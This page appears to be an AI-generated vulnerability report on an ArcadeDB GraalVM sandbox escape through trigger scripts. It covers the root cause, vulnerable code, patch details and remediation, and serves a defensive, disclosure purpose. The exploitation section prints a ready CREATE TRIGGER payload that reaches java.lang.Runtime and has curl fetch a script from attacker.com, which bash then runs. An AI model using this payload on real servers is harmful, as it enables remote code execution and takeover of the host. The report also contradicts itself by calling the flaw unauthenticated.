CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



GHSA-X9F9-R4M8-9XC2

GHSA-x9f9-r4m8-9xc2: Remote Code Execution via GraalVM Polyglot Sandbox Bypass in ArcadeDB Trigger Scripts

Alon Barad
Alon Barad
Software Engineer

Jul 17, 2026·6 min read·5 visits

Executive Summary (TL;DR)

An input validation and sandbox configuration vulnerability in ArcadeDB's script execution engine allows authenticated database users with schema modification privileges to execute arbitrary operating system commands by bypassing the GraalVM polyglot container using direct Java host class reflection.

ArcadeDB is an open-source, multi-model database engine supporting graph, document, key-value, and vector models. In affected versions of ArcadeDB, the trigger script executor improperly configures GraalVM scripting engine permissions. By allowing the 'java.lang.*' package to be loaded within the scripting context, the sandbox environment can be bypassed. An authenticated user with schema administration privileges ('UPDATE_SCHEMA') can register a malicious script trigger that executes arbitrary Java host classes, leading to unauthenticated remote command execution under the context of the ArcadeDB server process.

Vulnerability Overview

ArcadeDB implements an extensive trigger subsystem that allows users to execute custom scripting logic (e.g., JavaScript or GraalVM languages) in response to database lifecycle events such as record creation, modification, or deletion. This capabilities framework is managed by the ScriptTriggerExecutor component within the arcadedb-engine module.

To prevent untrusted scripts from compromising the underlying system, database engines rely on polyglot sandboxes to restrict guest language access to the host Java Virtual Machine (JVM). When a database exposes script execution pathways, the boundary between the guest script and host execution environment must be tightly managed. If the sandbox configuration is permissive, the guest environment can escape its boundary and invoke host OS operations.

This vulnerability arises from a permissive package import configuration within the GraalVM scripting engine wrapper in ArcadeDB. It allows administrative-level database users who hold the schema-level privilege UPDATE_SCHEMA to escape the sandbox restriction and execute arbitrary system commands, resulting in full compromise of the hosting environment.

Root Cause Analysis

The fundamental flaw resides within the GraalVM context configuration in ScriptTriggerExecutor.java around line 56. The component instantiates a GraalVM Context to compile and execute trigger script strings. However, the context configuration is initialized with highly permissive class loading rules.

Specifically, the allowedPackages configuration includes the java.lang.*, java.util.*, java.time.*, and java.math.* namespaces. GraalVM's interop utilities allow guest languages to look up host Java classes via the helper function Java.type(). By placing java.lang.* in the package allowlist, guest scripts are granted access to core runtime Java classes, including java.lang.Runtime and java.lang.ProcessBuilder.

Furthermore, the configuration relied on the GraalVM sandbox setting allowCreateProcess(false) under the assumption that it would block process creation. However, this parameter only restricts guest-native process management APIs. It does not inspect or block direct host-level reflection calls when the host class lookup is explicitly permitted by package allowlists and the context is configured with standard reflection permissions (HostAccess.ALL). Consequently, the API-level sandbox defense fails, enabling direct access to the JVM's host environment.

Control Flow and Code Analysis

The vulnerability sequence proceeds from trigger registration to command execution. The diagram below illustrates how an attacker utilizes the UPDATE_SCHEMA privilege to register a trigger, which subsequently bypasses the GraalVM sandbox during database mutation events:

Before patching, the vulnerability was present in the initialization logic of ScriptTriggerExecutor.java where the GraalVM context builder did not restrict access to host classes:

// VULNERABLE CODE PATH (ScriptTriggerExecutor.java)
Context context = Context.newBuilder("js")
    .allowHostAccess(HostAccess.ALL) // Allows access to all host methods
    .allowHostClassLookup(className -> {
        // Deficient logic permits java.lang.* packages
        return allowedPackages.stream().anyMatch(p -> className.startsWith(p));
    })
    .allowCreateProcess(false) // Only restricts guest process API, not reflection
    .build();

The corresponding authorization check in LocalSchema.java also allowed users with only schema-modification rights to deploy dangerous scripts:

// VULNERABLE PRIVILEGE CHECK (LocalSchema.java)
public void createTrigger(final String className, final String triggerName) {
    // Gated solely behind UPDATE_SCHEMA
    database.getSecurity().checkPermissions(SecurityDatabaseUser.RESOURCE_DATABASE.SCHEMA, SecurityDatabaseUser.AN_UPDATE);
    // Trigger registration logic...
}

In the patched release (version 26.7.2), the developers addressed this vulnerability by removing java.lang.* from the exposed package list, changing HostAccess.ALL to HostAccess.EXPLICIT, and gating trigger registration behind the highly restricted UPDATE_SECURITY permission.

Exploitation Methodology

An attacker must possess credentials targeting the ArcadeDB server that are assigned the UPDATE_SCHEMA privilege tier. This level of access is typically granted to database schema designers or application administrators who do not possess full system database administration (superuser) or security administration rights.

First, the attacker establishes a connection to the database's HTTP, SQL, or Cypher query endpoint and defines a javascript-based trigger using the CREATE TRIGGER query syntax. The trigger payload loads the JVM java.lang.Runtime class using GraalVM's Java.type interface:

CREATE TRIGGER malicious_trigger ON <target_class> AFTER INSERT EXECUTE JAVASCRIPT '
    var RuntimeClass = Java.type("java.lang.Runtime");
    var runtimeInstance = RuntimeClass.getRuntime();
    runtimeInstance.exec("curl http://attacker.com/payload.sh -o /tmp/payload.sh");
    runtimeInstance.exec("bash /tmp/payload.sh");
'

Following registration, the attacker initiates the trigger by performing a standard record insertion into the target class. When the operation completes, ScriptTriggerExecutor compiles and runs the javascript payload. Because the package checks pass, the GraalVM context fetches the actual host JVM Runtime object, spawning the shell command on the host OS with the permissions of the ArcadeDB application process.

Impact Assessment & Related Security Audits

A successful exploit results in Remote Code Execution (RCE) on the database host. Because database servers frequently run with elevated administrative privileges, an attacker can access sensitive configuration files, modify internal database contents, extract database credentials, or move laterally within the deployment environment.

In addition to the scripting trigger vulnerability, the 26.7.2 release addresses several other vulnerabilities identified during a security audit. These security updates resolve a Server-Side Request Forgery (SSRF) flaw in database imports (SourceDiscovery.java), a failure to enforce authorization checks in backup/export endpoints (BackupDatabaseStatement.java), an HTTP body size validation bypass in chunked transfer decoding causing potential Denial of Service (DoS), and the absence of a brute-force prevention lockout mechanism for user authentication.

The aggregate risk profile of unpatched ArcadeDB servers is elevated due to these overlapping vectors. An attacker with minimal initial database access can utilize this exploit chain to pivot from low-privilege database administrative access to complete control of the host operating system.

Remediation and Patch Analysis

To remediate this vulnerability, system administrators must upgrade the arcadedb-engine dependency and database servers to version 26.7.2 or later. The update introduces significant architectural security hardening:

  1. Explicit Host Access Mapping: The engine now enforces HostAccess.EXPLICIT, requiring methods to be annotated with @HostAccess.Export before they are accessible to guest environments.

  2. Restrictive Package Filtering: The engine explicitly blocks the loading of namespaces related to process execution, class reflection, and arbitrary system calls (removing java.lang.* completely from allowed context structures).

  3. Privilege Gating Escalation: The authorization layer for registering triggers has been moved from the UPDATE_SCHEMA privilege to the UPDATE_SECURITY privilege, ensuring only full security administrators can upload script files.

If upgrading immediately is not feasible, administrators should disable script-based trigger capabilities entirely in the server's database configuration files or restrict the UPDATE_SCHEMA permission to only highly trusted administrative accounts.

Official Patches

ArcadeDataArcadeDB release 26.7.2 tag containing patches for the trigger execution vulnerability and security audit findings.

Technical Appendix

CVSS Score
8.4/ 10
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
EPSS Probability
0.05%
Top 89% most exploited

Affected Systems

ArcadeDB Servercom.arcadedb:arcadedb-engine (Maven package)

Affected Versions Detail

Product
Affected Versions
Fixed Version
arcadedb-engine
ArcadeData
>= 21.9.1, < 26.7.226.7.2
AttributeDetail
CWE IDCWE-94 (Improper Control of Generation of Code)
Attack VectorNetwork (AV:N)
CVSS v4.0 Score8.4 (High)
Exploit StatusProof-of-Concept
KEV StatusNot Listed
Affected ComponentScriptTriggerExecutor.java
Prerequisite PrivilegesUPDATE_SCHEMA (High)

MITRE ATT&CK Mapping

T1190Exploit Public-Facing Application
Initial Access
T1059.002Command and Scripting Interpreter: AppleScript / JavaScript
Execution
T1068Exploitation for Privilege Escalation
Privilege Escalation
CWE-94
Improper Control of Generation of Code ('Code Injection')

The software constructs code using externally-influenced input, allowing an attacker to execute arbitrary code within the context of the application.

Known Exploits & Detection

GitHubThe advisory details the syntax for creating the exploit trigger bypassing the GraalVM scripting sandbox using Java.type reflection statements.

Vulnerability Timeline

Vulnerability discovered, patched, and release version 26.7.2 published
2026-07-16
GitHub Security Advisory GHSA-x9f9-r4m8-9xc2 published
2026-07-16

References & Sources

  • [1]ArcadeDB Trigger Scripts Run with java.lang.* Allowed, Enabling Remote Code Execution
  • [2]ArcadeDB GitHub Code Repository
  • [3]ArcadeDB Release 26.7.2

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.

More Reports

•about 1 hour ago•CVE-2026-52870
7.6

CVE-2026-52870: Broken Object-Level Authorization (BOLA) in Model Context Protocol (MCP) Python SDK

CVE-2026-52870 is a high-severity Broken Object-Level Authorization (BOLA) / Missing Authorization vulnerability (CWE-862) discovered in the experimental tasks feature of the Model Context Protocol (MCP) Python SDK. Under affected versions (< 1.27.2), default handlers registered via server.experimental.enable_tasks() allowed connected clients to enumerate, access, and terminate active tasks belonging to other user sessions due to a lack of session ownership validation. This compromised multi-tenant isolation, allowing authenticated users to extract execution data and cancel running jobs across concurrent connections. The vulnerability has been resolved in version 1.27.2 through session-scoping of task identifiers and transport session pinning.

Amit Schendel
Amit Schendel
0 views•6 min read
•about 2 hours ago•GHSA-48QW-824M-86PR
7.7

GHSA-48QW-824M-86PR: Privilege Escalation and Sandbox Escape in ArcadeDB Server

A high-severity privilege escalation and sandbox escape vulnerability exists in ArcadeDB Server prior to version 26.7.1. This flaw permits an authenticated user with read-only privileges to execute arbitrary JVM code in a sandboxed JavaScript context via the API command endpoint. By utilizing reflection on bound Java objects, an attacker can bypass the GraalVM guest environment's whitelist, access the Java ClassLoader, and perform arbitrary file reads on the host filesystem.

Alon Barad
Alon Barad
1 views•6 min read
•about 8 hours ago•CVE-2026-59950
7.6

CVE-2026-59950: Cross-Site WebSocket Hijacking in Model Context Protocol Python SDK

CVE-2026-59950 is a high-severity security vulnerability in the Model Context Protocol (MCP) Python SDK. Prior to version 1.28.1, the SDK's deprecated WebSocket server transport accepted incoming connection handshakes without performing validation on the Host or Origin headers. Because web browsers do not restrict WebSocket connections using the Same-Origin Policy (SOP), this enables malicious third-party websites to perform a Cross-Site WebSocket Hijacking (CSWSH) attack, executing unauthorized commands on behalf of the local user.

Alon Barad
Alon Barad
7 views•6 min read
•about 8 hours ago•CVE-2026-56271
9.8

CVE-2026-56271: Authentication Bypass via Hardcoded JWT Secrets in Flowise Enterprise Passport Middleware

CVE-2026-56271 represents a critical security flaw in Flowise, an open-source visual orchestration platform for Large Language Models (LLMs) and autonomous AI agents. The vulnerability occurs within the platform's enterprise passport authentication module, where default cryptographic parameters are used in the absence of explicit environment variables. Specifically, the middleware silently falls back to known, static hardcoded secrets ('auth_token' and 'refresh_token') and identifiers ('AUDIENCE' and 'ISSUER') to generate and verify session tokens. Consequently, remote unauthenticated attackers can construct arbitrary JSON Web Tokens (JWTs) signed with these hardcoded credentials to gain administrative entry to the application.

Alon Barad
Alon Barad
6 views•6 min read
•about 9 hours ago•CVE-2026-20744
9.8

CVE-2026-20744: Improper Access Control in Le Circuit Électrique Charging Station Backend

A critical improper access control vulnerability (CWE-284) in the WebSocket upgrade endpoint of Le Circuit Électrique charging station backend allows remote, unauthenticated attackers to connect to the Charging Station Management System and impersonate charging stations.

Alon Barad
Alon Barad
5 views•8 min read
•about 9 hours ago•CVE-2026-55040
9.1

CVE-2026-55040: Microsoft SharePoint Server Security Feature Bypass Vulnerability

CVE-2026-55040 is a critical security feature bypass vulnerability in Microsoft SharePoint Server arising from a weak authentication mechanism (CWE-1390). An unauthenticated remote attacker can exploit this security flaw over a network to bypass authentication validation routines, gaining unauthorized access to the application and complete control over sensitive enterprise data assets without any user interaction.

Amit Schendel
Amit Schendel
13 views•5 min read